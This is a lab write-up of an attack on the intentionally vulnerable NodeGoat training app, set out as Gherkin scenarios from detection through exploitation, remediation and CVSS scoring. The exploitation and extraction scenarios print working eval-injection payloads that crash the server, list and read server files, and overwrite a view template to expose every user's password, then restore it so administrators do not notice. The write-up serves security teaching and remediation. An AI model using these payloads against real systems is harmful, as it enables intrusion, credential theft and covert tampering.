## Version 1.4.1
## language: en

Feature: Dump Database
  TOE:
    node-goat
  Category:
    Permissions, Privileges, and Access Controls
  Location:
    http://localhost:4000/memos
  CWE:
    CWE-264: Permissions, Privileges, and Access Controls
    https://cwe.mitre.org/data/definitions/264.html
    CWE-95: Improper Neutralization of Directives in Dynamically
    Evaluated Code (Eval Injection)
    https://cwe.mitre.org/data/definitions/95.html
  Rule:
    REQ.173: Discard unsafe inputs
    https://fluidattacks.com/web/rules/173/
    REQ.186: Use minimum level of privileges
    https://fluidattacks.com/web/rules/186/
  Goal:
    Dump the database
  Recommendation:
    Validate all user inputs and avoid the use of eval() and other unsafe
    functions.

  Background:
  Hacker's software:
    | <Software name> |    <Version>    |
    | Windows         |       10        |
    | Chrome          |  80.0.3987.122  |
    | DirBuster       |      0.12       |
  TOE information:
    Given I am accessing the site http://localhost:4000
    And the server is running MongoDB version 2.1.18
    And Nodejs version 10.15.3

  Scenario: Normal use case
    Given I access to "http://localhost:4000/"
    And login in with a new user
    When I was redirect to dashboard
    And I can manage my account

  Scenario: Static detection
    Given The source code
    When I see the code in "/app/views/login.html"
    Then I see that the form try to get "{{userName}}", "{{password}}"
    And I think that those are the name of the fields in database
    When I see the code in "/app/views/benefits.html"
    Then I see the following lines
    """
    <tbody> {% for user in users %} <tr>
      <td>{{user._id.toString()}}</td>
      <td>{{user.firstName}}</td>
      <td>{{user.lastName}}</td>
    """
    And I see that the page try to load some data
    When I read again I see that the table name can be "users"
    Then I see that the page try to get the info of each user
    And I think that I can use that to dump the database
    When I see the code in "/app/routes/contributions.js"
    Then I see the following lines
    """
    var preTax = eval(req.body.preTax);
    var afterTax = eval(req.body.afterTax);
    var roth = eval(req.body.roth);
    """
    And I found that function eval is vulnerable to injections
    When I think a way to use this 3 things
    Then I think that I can use injections to dump the database
    And I found a vulnerability

  Scenario: Dynamic detection
    Given I'm logged in the page
    And I'm in the contributions tab
    When I use the input fields to update the contributions
    Then I see that the contirbutions update the values
    And I think if this input is vulnerable
    When I try to see if the input is vulnerable
    Then I try to inject something like scripts
    And I see that the scripts didn't work
    When I try to use a command injection like "process.exit()"
    Then I found that the server drops [evidence](img1)
    And I make a DoS
    When I see that the server is vulnerable to command injection
    Then If the server is runing in Nodejs I can use fs function
    And I found a vulnerability

  Scenario: Exploitation
    Given The system is vulnerable to command injections
    And The server is running in Nodejs
    Then I want to dump the database
    When I go to the page to attack
    Then I see a login form
    And I go to singup link
    When I register with fake credentials
    Then I try to login
    And I'm redirecting to dashboard tab
    When I see if i can find secret tabs
    Then I use DirBuster to find secret tabs
    And I find some routes
    When I see the routes that i find with DirBuster [evidence](img2)
    Then I found that "benefits" are not in my menu
    And I think that tab have some privilege data
    When I try to know where is in that tab but was blocked
    Then I'm redirect to the benefits tab
    And I see that this tab get some sensitive data for the users [evidence](img3)
    When I try to make a way to use that tab
    Then I try to find another vulnerability
    Then I found an interesting tab "contributions"
    And I found 3 fields to input data and update
    When I try to use this field to injections
    Then I found that this fields are vulnerable to command injection
    And I try to use fs library to search in it
    When I type the following command
    """
    res.end(require('fs').readdirSync('.').toString())
    """
    Then I see the response with the files in the server
    """
    .gitignore,.jshintrc,.nodemonignore,.vscode,app,app.json,artifacts,
    config,docker-compose.yml,Dockerfile,Gruntfile.js,LICENSE,node_modules,
    package-lock.json,package.json,Procfile,README.md,server.js,test
    """
    And I try to found a way to use that
    When I read every route and file with the commands
    """
    readdirSync for directories
    res.end(require('fs').readdirSync('<route>').toString())

    readFileSync for files
    res.end(require('fs').readFileSync('<route>/<file>'))
    """
    Then I found the route "app/views/benefits.html"
    And I can read the content of this secret tab
    When I see the content I found an interesting thing
    """
    <tbody> {% for user in users %} <tr>
      <td>{{user._id.toString()}}</td>
      <td>{{user.firstName}}</td>
      <td>{{user.lastName}}</td>
    """
    Then  I found the name of the table "users"
    And I found some fields of the table "firstName", "lastName"
    And I exploit the vulnerability

  Scenario: Extraction
    Given The "benefits.html" file, the name of the table
    Given I want to extract the users and passwords from the table
    When I try to use this file to get the usernames and passwords
    Then I go to the file "login.html" in the same route of benefits
    And I found a hint for the names in the table for the user and pass
    """
    <div class="form-group">
      <label for="userName">User Name</label>
      <input type="text" class="form-control" id="userName" name="userName"
              value="{{userName}}" placeholder="Enter User Name">
    </div>

    <div class="form-group">
      <label for="password">Password</label>
      <input type="password" class="form-control" id="password" name="password"
              value="{{password}}" placeholder="Enter Password">
    </div>
    """
    When I see the attribute value I found "{{userName}}", "{{password}}"
    Then I think that those values can be the names of the fields in the table
    And I copy the content of the "benefits.html" file
    When I copy the content, I try to edit it
    Then I add some lines to get th usernames and passwords of each user
    """
    <th class="col-md-2">User</th>
    <th class="col-md-2">Password</th>
    ...................................
    <td>{{user.userName}}</td>
    <td>{{user.password}}</td>
    """
    And I need to change the original file to my evil file
    When I try to change the files I use the following command
    """
    res.end(require('fs').writeFile('app/views/benefits.html', '<new content>',
    'utf8',(err) => {if (err) throw err;
    console.log('<message to see in console>');}))
    """
    Then I get a blank response
    And I try to see if my overwrite works
    When I type in the URL "<domain>/benefits.html"
    Then I see the tab but with the users and passwords [evidence](img4)
    And I dump the database, and download the users and passwords
    When I dump the database I think that I must to change the file again
    Then I use the last command but in this case I use the old HTML code
    And I think that with this the admin server don't notice anything
    And I extract the data

  Scenario: Remediation
    Given The source code
    When I go to the route "app/routes/index.js"
    Then I try to add a middleware to make that only admin access to "benefits"
    """
    var isAdmin = sessionHandler.isAdminUserMiddleware;
    """
    And I found some lines related to "benefits"
    """
    app.get("/benefits", isLoggedIn, benefitsHandler.displayBenefits);
    app.post("/benefits", isLoggedIn, benefitsHandler.updateBenefits);
    """
    When I want to change those lines for use the middleware
    """
    app.get("/benefits", isLoggedIn, isAdmin, benefitsHandler.displayBenefits);
    app.post("/benefits", isLoggedIn, isAdmin, benefitsHandler.updateBenefits);
    """
    Then Only admin users can access the site
    When I enter to "http://localhost:4000/benefits"
    Then I am redirected to the login page
    And I need to fix the injection too
    When I go to the route "/app/routes/contributions.js"
    Then I see the following code
    """
    var preTax = eval(req.body.preTax);
    var afterTax = eval(req.body.afterTax);
    var roth = eval(req.body.roth);
    """
    And I want to change eval() because is vulnerable
    When I found a way to validate the input with a safe function
    Then I change those lines with
    """
    var preTax = parseInt(req.body.preTax);
    var afterTax = parseInt(req.body.afterTax);
    var roth = parseInt(req.body.roth);
    """
    And I try to simulate the attack again
    When I try go type in the url "<domain>/benefits.html"
    Then I'm redirecting to login [evidence](img5)
    And I fix that vulnerability
    When I login and go to "contributions" tab
    Then I try to inject the same command in the inputs
    """
    res.end(require('fs').readdirSync('.').toString())
    """
    And I see the response "Invalid contribution percentages"
    When I see that message I know that the injection fail
    Then I fix this vulnerability
    And I fix all vulnerabilities for this attack

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
      6.3/10 (Medium) - AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      5.7/10 (Medium) - E:F/RL:W/RC:R/CR:H/IR:M/AR:L
    Environmental: Unique and relevant attributes to a specific user environment
      7.0/10 (High) - MAV:N/MAC:L/MPR:L/MUI:R/MS:U/MC:H/MI:L/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-03-03
